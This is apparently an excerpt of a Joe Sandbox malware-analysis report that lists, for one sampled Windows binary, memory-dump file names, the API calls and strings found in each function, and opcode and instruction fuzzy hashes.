                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Menu$InfoItemTextWindow$CharDrawInvalidateNextRect
                                                                      • String ID:
                                                                      • API String ID: 1015379403-0
                                                                      • Opcode ID: c223660f41613faab48e644fda56d4534d60a7471830602c41769a8e954ea874
                                                                      • Instruction ID: cb17752b7d2392380de21d9e4e1d1fcc86ad781a8d47d41d525d14f98114f250
                                                                      • Opcode Fuzzy Hash: c223660f41613faab48e644fda56d4534d60a7471830602c41769a8e954ea874
                                                                      • Instruction Fuzzy Hash: 7702C321A4D68289EB20BF2096046B9E761FB847E4FE44232DA5E87BD4CF3CF545C790
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Cursor$Load$ErrorInfoLast
                                                                      • String ID:
                                                                      • API String ID: 3215588206-0
                                                                      • Opcode ID: 486734a10a8987c1c87853d7cfea6df4eeb43b8f453fb3bc83844081bd685034
                                                                      • Instruction ID: 9a1b623a57cf3fd4e00fe4c1cd5e6a58bbff41a5c6032b51bcbaf1c8310aee8a
                                                                      • Opcode Fuzzy Hash: 486734a10a8987c1c87853d7cfea6df4eeb43b8f453fb3bc83844081bd685034
                                                                      • Instruction Fuzzy Hash: BE516D32B0CB028AEB44AF64F41817E73A1FB48B68F844439DA4E87794DFBCE5558394
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: CloseValue$ConnectCreateRegistry
                                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                      • API String ID: 3314541760-966354055
                                                                      • Opcode ID: 265c0aadd30e599e88ee88e894c65e230150ea50144a7fdd654b0d5fdf7d7a66
                                                                      • Instruction ID: a2367f1f05821ec2ef411cea13e874dae40fd8d9d9164d82f696e723530bfe7d
                                                                      • Opcode Fuzzy Hash: 265c0aadd30e599e88ee88e894c65e230150ea50144a7fdd654b0d5fdf7d7a66
                                                                      • Instruction Fuzzy Hash: 10027F76B48A4685EB10FF26D4902ADB760FB88FA8B848432DE0D87756DF38F545C390
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: P
                                                                      • API String ID: 0-3110715001
                                                                      • Opcode ID: 088bba3a1016d805068b1795b2da5f6ed91fd4b1a7bbf8d4e2293c13cc0fe4ac
                                                                      • Instruction ID: 3fb1ddb122361784b45ff5dbef5b87fc9dc6ad977d809a271609029d5ab5c0cd
                                                                      • Opcode Fuzzy Hash: 088bba3a1016d805068b1795b2da5f6ed91fd4b1a7bbf8d4e2293c13cc0fe4ac
                                                                      • Instruction Fuzzy Hash: B7A1CF72A48A4186E724FF25D4142AAF760FB84BA8F908135DA5E83B94CF7CF545C7A0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: _get_daylight$ByteCharMultiWide_invalid_parameter_noinfo$InformationTimeZone
                                                                      • String ID: -$:$:$?
                                                                      • API String ID: 3440502458-92861585
                                                                      • Opcode ID: 2484a17d68417765dfea95e8ed30be907b8393143ee9075556b7ff4147a9153c
                                                                      • Instruction ID: bd430d645176e8bbb9097e0de5ac56f51f9030ffbfb6d3b56e74a9482b65dddf
                                                                      • Opcode Fuzzy Hash: 2484a17d68417765dfea95e8ed30be907b8393143ee9075556b7ff4147a9153c
                                                                      • Instruction Fuzzy Hash: EDE1C132A4829286FB24BF35A8505F9B791BB847B4F845139EB4DC2B95DF3CF44187A0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Time$File$FindLocalSystem$CloseFirst
                                                                      • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                      • API String ID: 3232708057-3289030164
                                                                      • Opcode ID: 5c779f221d7aeb540d444412295e12a250afa50e4e6d56f81e5e2491da9cccd3
                                                                      • Instruction ID: 648cf2ab6dc3d28fb05ec286550001740d7d1491e7e4d71ac2054eadd1a7b557
                                                                      • Opcode Fuzzy Hash: 5c779f221d7aeb540d444412295e12a250afa50e4e6d56f81e5e2491da9cccd3
                                                                      • Instruction Fuzzy Hash: D4D17262B5CA5685EB10FF65D4410FDA761FB807A8FC00032EA4D87B99EF78E548C7A0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentDirectoryTime$File$Localwcscat$Systemwcscpy
                                                                      • String ID: *.*
                                                                      • API String ID: 1111067124-438819550
                                                                      • Opcode ID: 98a71cfb6502df9087812816f04c928264b270ce88f96a393908c63e275b4126
                                                                      • Instruction ID: 0cef7babf226ffeb68b7b540ffe9b030e14a7586fcc445b0852a2106934e5e1e
                                                                      • Opcode Fuzzy Hash: 98a71cfb6502df9087812816f04c928264b270ce88f96a393908c63e275b4126
                                                                      • Instruction Fuzzy Hash: D5718F32658B8681DB10FF11D9401EEA361FB84BA8F845031DA4E87BA6DF79F545C7A0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                      • String ID: *.*
                                                                      • API String ID: 1409584000-438819550
                                                                      • Opcode ID: 8f313655dcbdbe42a35da08493f07892190d387efc47daab254f64e3a089ff94
                                                                      • Instruction ID: 8e928fb86f233fdb25e956ce8250b11921ca33cb402f347baeb638a9b111be12
                                                                      • Opcode Fuzzy Hash: 8f313655dcbdbe42a35da08493f07892190d387efc47daab254f64e3a089ff94
                                                                      • Instruction Fuzzy Hash: F3414C2560C65254EB00BF25E8482BAA391FB44FB8FC85131D96D83794DFBCF58983A0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: SendString
                                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                      • API String ID: 890592661-1007645807
                                                                      • Opcode ID: 6e164f36fc51d55b22e1026945b1aa4b641673a9c64d89865777c7d9524d423d
                                                                      • Instruction ID: f96aaf4daba62758aebe48cb01d4be48f75c411b91a05b681404770057eefb7f
                                                                      • Opcode Fuzzy Hash: 6e164f36fc51d55b22e1026945b1aa4b641673a9c64d89865777c7d9524d423d
                                                                      • Instruction Fuzzy Hash: 87216F22A1C95291FB20FF24E85566AA320BFD8758FD44031D64DC3A58DF7DE645C7A0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                      • String ID: *.*
                                                                      • API String ID: 2640511053-438819550
                                                                      • Opcode ID: d607f8cd377dc7cb12783564cfab50aac2a1e28959c9b0777418728c286e0dff
                                                                      • Instruction ID: dbf4385060ab19ae7d84c85d34e120db2c60c3df0ba2565be7d73809e0f2f755
                                                                      • Opcode Fuzzy Hash: d607f8cd377dc7cb12783564cfab50aac2a1e28959c9b0777418728c286e0dff
                                                                      • Instruction Fuzzy Hash: 2F417C21A0CA5290EA10BF15A8546BAA390FF40FF4FC85131DD6E87794DF7CF58A87A0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove
                                                                      • String ID: :$\$\??\%s
                                                                      • API String ID: 3827137101-3457252023
                                                                      • Opcode ID: c042ec0e4a157b4915e6cbee2efc7bd563a20e0e85c4cf7d435b60959deae5d8
                                                                      • Instruction ID: b0ff9617caf9608e0bf4ee560d34d901d5b6e7b8607aad73a9f1a4ee8c885912
                                                                      • Opcode Fuzzy Hash: c042ec0e4a157b4915e6cbee2efc7bd563a20e0e85c4cf7d435b60959deae5d8
                                                                      • Instruction Fuzzy Hash: 6241962161878385E720BF21E8046FDA3A0FF85BA8F840135DA0D87B98DF7CE546C750
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: QueryValue$Close$BuffCharConnectOpenRegistryUpper
                                                                      • String ID:
                                                                      • API String ID: 3218304859-0
                                                                      • Opcode ID: bfd33b311cee2062ccf4f7c99d60df25cce3d62e1d08c3ae9d56584007b3da53
                                                                      • Instruction ID: 0f075e4a6261375b121909f4ff777488e6f23ddd9795c48c225d73bb73c98274
                                                                      • Opcode Fuzzy Hash: bfd33b311cee2062ccf4f7c99d60df25cce3d62e1d08c3ae9d56584007b3da53
                                                                      • Instruction Fuzzy Hash: 5CF18176B49B428AEB10FF65D0902ACB370FB84BA8B858531DE4D87B95DF38E051C794
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                      • String ID:
                                                                      • API String ID: 2762341140-0
                                                                      • Opcode ID: 28da4375d56d9c7790266f2ac16f9c30a3cff06f711ae95f6c1a6b970e5d2d74
                                                                      • Instruction ID: 6008e5cc6e542e71c08422efce17f4284e99987775f15fa21d34e8b47cbe8012
                                                                      • Opcode Fuzzy Hash: 28da4375d56d9c7790266f2ac16f9c30a3cff06f711ae95f6c1a6b970e5d2d74
                                                                      • Instruction Fuzzy Hash: 34C14936748B8585EB10FF26E8841ADB760FB88BA8F854036DE4E87765DF38E445C750
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                      • String ID:
                                                                      • API String ID: 1255039815-0
                                                                      • Opcode ID: 5c88d37276b46e33d2a1e391526b812f5276439b55f88bb912c7bbc104166e1e
                                                                      • Instruction ID: cb4c4ae655be4665347e62f38aa3779edbbdfbad391f6040f7e854cccee61917
                                                                      • Opcode Fuzzy Hash: 5c88d37276b46e33d2a1e391526b812f5276439b55f88bb912c7bbc104166e1e
                                                                      • Instruction Fuzzy Hash: BE619F22B0865286EB10FF71D8445ADB7A4FB44BA8F848136DE0D93795DF38E445C3E4
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                      • String ID:
                                                                      • API String ID: 2395222682-0
                                                                      • Opcode ID: 392a36257488f8891aba19e7c901252a1c57c9e7be585a14d68986620d9dc28e
                                                                      • Instruction ID: 0d411232f44503d991bdff1265e52e1b2941cb4f2d24fb3005b57c0cfbf05d0e
                                                                      • Opcode Fuzzy Hash: 392a36257488f8891aba19e7c901252a1c57c9e7be585a14d68986620d9dc28e
                                                                      • Instruction Fuzzy Hash: 40D18F36B48B4686EB10BF75D4402ADB3B5FB88B98B904036CE5D97B64DF38E945C390
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$LongWindow
                                                                      • String ID:
                                                                      • API String ID: 312131281-0
                                                                      • Opcode ID: abdc22e6bb891721ce5e067b69be811f88521fd2379c3c8bf9918a79da049ba4
                                                                      • Instruction ID: 3d5850d19a517e3f74e8760f0aaac590f34d14e20a079e5ae0a07ae91bb25e0c
                                                                      • Opcode Fuzzy Hash: abdc22e6bb891721ce5e067b69be811f88521fd2379c3c8bf9918a79da049ba4
                                                                      • Instruction Fuzzy Hash: 2F71C676A09AD185E720EF65D8449EEB760FB88BA8F844032DE4D87B54CF7CE186C750
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                      • String ID:
                                                                      • API String ID: 1737998785-0
                                                                      • Opcode ID: d2932478822d6cf8368c376b04bf61354339a6436dc2c20ea892730455b54822
                                                                      • Instruction ID: 5a06378dd0712c68e2531ee1b519367687bb1fbfd96330e33c7d47e3f40c69e3
                                                                      • Opcode Fuzzy Hash: d2932478822d6cf8368c376b04bf61354339a6436dc2c20ea892730455b54822
                                                                      • Instruction Fuzzy Hash: 80414C76A4CA4282EB05BF55D494339A760FF54BA9F844435CA4E873A2DFBCF08187A4
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: File$Find$Delete$AttributesCloseCopyFirstFullMoveNameNextPath
                                                                      • String ID: \*.*
                                                                      • API String ID: 4047182710-1173974218
                                                                      • Opcode ID: 3e5e0e112cc80aa2c2516f057e4a01b659553512389772208b3739e74699da54
                                                                      • Instruction ID: 5fe4999f39fa05dad17424cc0d5d07c2b1856940f6e76b1a87edac0d11824157
                                                                      • Opcode Fuzzy Hash: 3e5e0e112cc80aa2c2516f057e4a01b659553512389772208b3739e74699da54
                                                                      • Instruction Fuzzy Hash: 74816822A58A4295EB10FF65E4401FDA760EB847A4FC41032EA8D877A5DF7CF589C7A0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
